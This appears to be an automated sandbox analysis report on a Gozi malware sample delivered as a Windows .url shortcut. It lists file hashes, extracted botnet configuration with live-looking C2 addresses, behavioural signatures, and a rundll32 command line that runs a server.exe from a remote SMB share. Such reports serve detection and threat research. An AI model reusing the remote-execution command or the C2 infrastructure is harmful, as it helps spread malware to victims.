Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
24-03-2023 08:16
Static task
static1
Behavioral task
behavioral1
Sample
Agenzia/Agenzia.url
Resource
win7-20230220-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Agenzia/Agenzia.url
-
Size
189B
-
MD5
0c3f7c2aa0311bf8c761b9b4e8b33d45
-
SHA1
4eaa085327b0cd857d43aacffdbc7963a67523d2
-
SHA256
025f536aab4e91765785e1d0897b55674f217b871e2afe0dba10ad1c5a9f1417
-
SHA512
710eeb07fbab0b978064220d3ed36bd7de04987f7e3f9a75a1920dd793847606a205d9205b4745edb59e65e3433ef84e7e98c8213017d24e2379533ffd0962b2
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
7716
C2
checklist.skype.com
193.233.175.115
185.68.93.20
62.173.140.250
46.8.210.133
Attributes
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 1416 wrote to memory of 800 1416 rundll32.exe server.exe PID 1416 wrote to memory of 800 1416 rundll32.exe server.exe PID 1416 wrote to memory of 800 1416 rundll32.exe server.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\46.8.210.86\Agenzia\server.exe"\\46.8.210.86\Agenzia\server.exe"2⤵